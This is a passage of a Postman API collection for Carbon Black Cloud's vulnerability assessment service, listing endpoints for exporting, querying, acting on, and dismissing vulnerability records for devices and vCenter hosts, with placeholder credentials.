]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/devices/vulnerabilities/export","description":"<p>Get a Vulnerability List in CSV format.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-a-vulnerability-list-in-csv-format\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","devices","vulnerabilities","export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"3de31c2e-f491-458c-97cd-a8cab0b98089"},{"name":"Get a Vulnerability List for a vCenter Server in CSV Format","id":"f8b4cc1c-cd96-49cc-864f-70f3444d83be","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"start\": \"<integer>\",\n    \"criteria\": {\n        \"property\": {\n            \"value\": \"<string>\",\n            \"operator\": \"<string>\"\n        }\n    },\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vcenters/{{cb_vcenter_uuid}}/devices/vulnerabilities/export","description":"<p>Get a Vulnerability List for a vCenter Server in CSV format.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-a-vulnerability-list-for-a-vcenter-server-in-csv-format\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vcenters","{{cb_vcenter_uuid}}","devices","vulnerabilities","export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"f8b4cc1c-cd96-49cc-864f-70f3444d83be"}],"id":"d05b8249-7e85-422f-a255-a02e70b0d858","_postman_id":"d05b8249-7e85-422f-a255-a02e70b0d858","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Device Level","item":[{"name":"Get Specific Device Vulnerability Summary","id":"f8ba5b60-8fd9-4d95-bdc2-00be7216f2d8","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/devices/{{cb_device_id}}/vulnerabilities/summary?category=OS","description":"<p>Get an Operating System or Application Vulnerability Summary for a specific device.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-specific-device-vulnerability-summary\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","devices","{{cb_device_id}}","vulnerabilities","summary"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Category to match on. [OS, APP]</p>\n","type":"text/plain"},"key":"category","value":"OS"}],"variable":[]}},"response":[],"_postman_id":"f8ba5b60-8fd9-4d95-bdc2-00be7216f2d8"},{"name":"Get Specific vCenter Device Vulnerability Summary","id":"be94d123-fd59-4a66-b3fe-46970aa14ddc","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vcenters/{{cb_vcenter_uuid}}/devices/{vm_id}/vulnerabilities/summary?category=OS","description":"<p>Get an Operating System or Application Vulnerability Summary for a specific vCenter device.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-specific-vcenter-device-vulnerability-summary\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vcenters","{{cb_vcenter_uuid}}","devices","{vm_id}","vulnerabilities","summary"],"host":["{{cb_url}}"],"query":[{"key":"category","value":"OS"}],"variable":[]}},"response":[],"_postman_id":"be94d123-fd59-4a66-b3fe-46970aa14ddc"},{"name":"Get Specific Device Vulnerability List","id":"a19a590c-10bb-42f2-a240-595f4fed2f21","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"start\": \"<integer>\",\n    \"criteria\": {\n        \"property\": {\n            \"value\": \"<string>\",\n            \"operator\": \"<string>\"\n        }\n    },\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/devices/{{cb_device_id}}/vulnerabilities/_search?dataForExport=true","description":"<p>Get an Operating System or Application Vulnerability List for a specific device.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-specific-device-vulnerability-list\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","devices","{{cb_device_id}}","vulnerabilities","_search"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Whether to send detailed data for export. [true, false]</p>\n","type":"text/plain"},"key":"dataForExport","value":"true"}],"variable":[]}},"response":[],"_postman_id":"a19a590c-10bb-42f2-a240-595f4fed2f21"},{"name":"Get Specific vCenter Device Vulnerability List","id":"d9ecdac6-04d9-4c14-8de0-d688053a4f18","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"start\": \"<integer>\",\n    \"criteria\": {\n        \"property\": {\n            \"value\": \"<string>\",\n            \"operator\": \"<string>\"\n        }\n    },\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vcenters/{{cb_vcenter_uuid}}/devices/{{cb_vm_id}}/vulnerabilities/_search?dataForExport=true","description":"<p>Get an Operating System or Application Vulnerability List for a specific vCenter device.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-specific-vcenter-device-vulnerability-list\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vcenters","{{cb_vcenter_uuid}}","devices","{{cb_vm_id}}","vulnerabilities","_search"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Whether to send detailed data for export. [true, false]</p>\n","type":"text/plain"},"key":"dataForExport","value":"true"}],"variable":[]}},"response":[],"_postman_id":"d9ecdac6-04d9-4c14-8de0-d688053a4f18"},{"name":"Get a Vulnerability List for Specific Device in CSV Format","id":"b4eb72da-c45b-42bf-9258-79101dc2a297","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"start\": \"<integer>\",\n    \"criteria\": {\n        \"property\": {\n            \"value\": \"<string>\",\n            \"operator\": \"<string>\"\n        }\n    },\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/devices/{{cb_device_id}}/vulnerabilities/export","description":"<p>Get a Vulnerability List for a specific device in CSV format.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-a-vulnerability-list-for-specific-device-in-csv-format\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","devices","{{cb_device_id}}","vulnerabilities","export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"b4eb72da-c45b-42bf-9258-79101dc2a297"},{"name":"Get a Vulnerability List for Specific vCenter Device in CSV Format","id":"842bcdae-6e40-46a2-8a24-c47b34e9834d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"start\": \"<integer>\",\n    \"criteria\": {\n        \"property\": {\n            \"value\": \"<string>\",\n            \"operator\": \"<string>\"\n        }\n    },\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vcenters/{{cb_vcenter_uuid}}/devices/{{cb_vm_id}}/vulnerabilities/export","description":"<p>Get a Vulnerability List for a specific vCenter device in CSV format.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-a-vulnerability-list-for-specific-device-in-csv-format\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vcenters","{{cb_vcenter_uuid}}","devices","{{cb_vm_id}}","vulnerabilities","export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"842bcdae-6e40-46a2-8a24-c47b34e9834d"},{"name":"Perform Action on a Device","id":"2f70ee35-f9c7-4534-8bc2-932b1412a998","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"action_type\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/devices/{{cb_device_id}}/device_actions","description":"<p>Perform an action on a specific device.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#perform-action-on-a-device\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","devices","{{cb_device_id}}","device_actions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"2f70ee35-f9c7-4534-8bc2-932b1412a998"},{"name":"Perform Action on a vCenter Device","id":"0bdeb674-a7d4-4304-8d4f-40cf4c3c9699","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"action_type\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vcenters/{{cb_vcenter_uuid}}/devices/{{cb_vm_id}}/device_actions","description":"<p>Perform an action on a specific vCenter device.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#perform-action-on-a-vcenter-device\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vcenters","{{cb_vcenter_uuid}}","devices","{{cb_vm_id}}","device_actions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"0bdeb674-a7d4-4304-8d4f-40cf4c3c9699"}],"id":"8deef26d-353e-4482-b53f-03ad971cc955","_postman_id":"8deef26d-353e-4482-b53f-03ad971cc955","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Vulnerability Level","item":[{"name":"Get Affected Assets for Specific Vulnerability","id":"d05c5c51-b65b-4e2a-8cc6-83274220a767","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"os_product_id\": \"313_0\",\n    \"query\": \"Python\",\n    \"rows\": 20,\n    \"start\": 0,\n    \"criteria\": {\n        \"severity\": {\n            \"value\": \"CRITICAL\",\n            \"operator\": \"EQUALS\"\n        }\n    },\n    \"sort\": [\n        {\n            \"field\": \"arch\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vulnerabilities/{{cb_cve_id}}/devices","description":"<p>Get a list of assets affected by a specific vulnerability CVE ID.</p>\n<p>Request schema</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"os_product_id\": \"string\",\n    \"query\": \"&lt;string&gt;\",\n    \"rows\": \"&lt;integer&gt;\",\n    \"start\": \"&lt;integer&gt;\",\n    \"criteria\": {\n        \"property\": {\n            \"value\": \"&lt;string&gt;\",\n            \"operator\": \"&lt;string&gt;\"\n        }\n    },\n    \"sort\": [\n        {\n            \"field\": \"&lt;string&gt;\",\n            \"order\": \"&lt;string&gt;\"\n        }\n    ]\n}\n\n</code></pre>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-affected-assets-for-specific-vulnerability\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vulnerabilities","{{cb_cve_id}}","devices"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"d05c5c51-b65b-4e2a-8cc6-83274220a767"},{"name":"Get Affected Assets for Specific Vulnerability in vCenter","id":"86dd7997-afe7-4fed-bc8f-2f9c7c5f6817","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"os_product_id\": \"string\",\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"start\": \"<integer>\",\n    \"criteria\": {\n        \"property\": {\n            \"value\": \"<string>\",\n            \"operator\": \"<string>\"\n        }\n    },\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vcenters/{{cb_vcenter_uuid}}/vulnerabilities/{{cb_cve_id}}/devices","description":"<p>Get a list of vCenter assets affected by a specific vulnerability CVE ID.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-affected-assets-for-specific-vulnerability-in-vcenter\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vcenters","{{cb_vcenter_uuid}}","vulnerabilities","{{cb_cve_id}}","devices"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"86dd7997-afe7-4fed-bc8f-2f9c7c5f6817"},{"name":"Get Vulnerability Details","id":"18021e1d-ce8f-480c-886f-58288c16172b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/vulnerabilities/{{cb_cve_id}}","description":"<p>Get vulnerability details for a specific CVE ID.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-vulnerability-details\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerabilities","{{cb_cve_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"18021e1d-ce8f-480c-886f-58288c16172b"},{"name":"Dismiss Vulnerabilities","id":"3b471cbc-a263-4075-adcb-f5fd59769e64","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"action_type\": \"DISMISS\",\n    \"dismiss_reason\": \"OTHER\",\n    \"notes\": \"testing\",\n    \"criteria\": {\n        \"os_product_id\": {\n            \"operator\": \"EQUALS\",\n            \"value\": \"327_90520\"\n        }\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vulnerabilities/{{cb_cve_id}}/actions","description":"<p>Dismiss vulnerabilities you no longer want to see by CVE and OS Product ID.</p>\n<p>Request Schema</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"action_type\": \"&lt;string&gt;\",\n    \"dismiss_until\": \"&lt;string&gt;\",\n    \"dismiss_reason\": \"&lt;string&gt;\",\n    \"notes\": \"Demo\",\n    \"rule_ids\": \"&lt;array&gt;\",\n    \"criteria\": {\n        \"os_product_id\":{\n            \"operator\":\"&lt;string&gt;\",\n            \"value\":\"&lt;string&gt;\"\n        }\n    }\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vulnerabilities","{{cb_cve_id}}","actions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"3b471cbc-a263-4075-adcb-f5fd59769e64"},{"name":"Undismiss Vulnerabilities","id":"35a5ea27-8252-4588-b5c2-0d145278e1eb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"action_type\": \"UNDISMISS\",\n    \"rule_ids\": \"<array>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vulnerabilities/{{cb_cve_id}}/actions","description":"<p>Unhide dismissed vulnerabilities to regain visibility.</p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vulnerabilities","{{cb_cve_id}}","actions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"35a5ea27-8252-4588-b5c2-0d145278e1eb"},{"name":"Dismiss Edit Vulnerabilities","id":"a7feb3a0-969b-4a0f-a595-7f75bf7386fc","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"action_type\": \"DISMISS_EDIT\",\n    \"dismiss_reason\": \"<string>\",\n    \"notes\": \"<string>\",\n    \"rule_ids\": \"<array>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vulnerabilities/{{cb_cve_id}}/actions","description":"<p>Update the dismiss reason and the notes for a dismissed vulnerability.</p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud 